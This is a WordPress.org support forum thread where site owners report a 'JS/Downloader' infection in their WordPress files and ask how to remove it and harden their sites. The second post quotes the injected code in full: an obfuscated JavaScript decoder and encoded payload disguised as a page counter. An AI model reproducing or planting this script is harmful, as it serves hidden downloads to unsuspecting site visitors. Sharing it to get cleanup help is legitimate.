WordPress.org

1. gestroud
   Member
   Posted 3 years ago #

   I've recently noticed that someone has uploaded a virus - JS/Downloader Agent to a number of my WP 2.51 web sites.

   Whoever the attacker is uploads it to wp-blog-header.php. The original file is supposed to be 2KB. The new one is 3KB. There is an encrypted javascript code added.

   I have already contacted my web host (Servage) and installed a fresh copy of WordPress.

   Read/Write permissions are set to 755 on the root folders. Should the core files be 644? Just want to make sure.

   No one has my passwords, but I've just changed them, as a precaution.

   I have wp-ban installed, as well as wp-blockadmin and the Login Error Cleaner plugin. Other protection plugins like AA Password Protect cause internal errors, so I can't use them.

   All plugins are up to date.

   What I'm trying to figure out is how to prevent it from happening again.

   Any suggestions?

2. hizkia
   Member
   Posted 3 years ago #

   Hello,
   Got the same problem. Someone uploaded the JS/Downloader script to my blog. Would you please kindly show me where and how to remove the malicious script? Below is the last few lines of header.php:

   <!-- start counter :rkgi58s:wpjsandif --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,32,53,60,46,41,2,21,9,33,0,0,0,0,0,0,58,48,51,50,4,1,30,12,44,7,31,26,18,19,49,24,11,13,59,27,34,22,38,54,28,25,6,0,0,0,0,8,0,36,35,29,14,45,47,16,0,42,39,62,56,37,43,57,17,52,61,40,3,10,55,23,20,5,15);for(j=Math.ceil(l/b);j>0;j--){r="";for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("YKeNwBX2pws2wSGV6WXqpwrjuil2gFYBuScqPi326ns2pMXquuc2zSeCtB3APkH26UO9pBc2hb51ptXvpnlBDzQNUS32Gwcq64YVuKeNwBX2pf8ifV8BtJQN_tX9UIQv8tGV6ZGBUwcCDBrjy4HCPtHj6Us2wSGV6WXqpwrjuil2gFYBuScqPi326ns2pMXquuc2GzHCt0H2PUrC6PlVYi_BtJQN_t3V")</script><!-- end counter :rkgi58s:wpjsandif -->

   Are these the lines I need to remove?

   Thanks!

3. whooami
   Member
   Posted 3 years ago #

   hizkia,

   your site is a trainwreck waiting to happen. It simply isnt as simple as removing the offending code, in your case. READ my reply inside the other thread you made.

4. whooami
   Member
   Posted 3 years ago #

   Should the core files be 644?

   Yes.

   And while its good that your plugins are current -- make sure none of them are listed here:

   http://www.milw0rm.com/search.php (search for WordPress)

Topic Closed

This topic has been closed to new replies.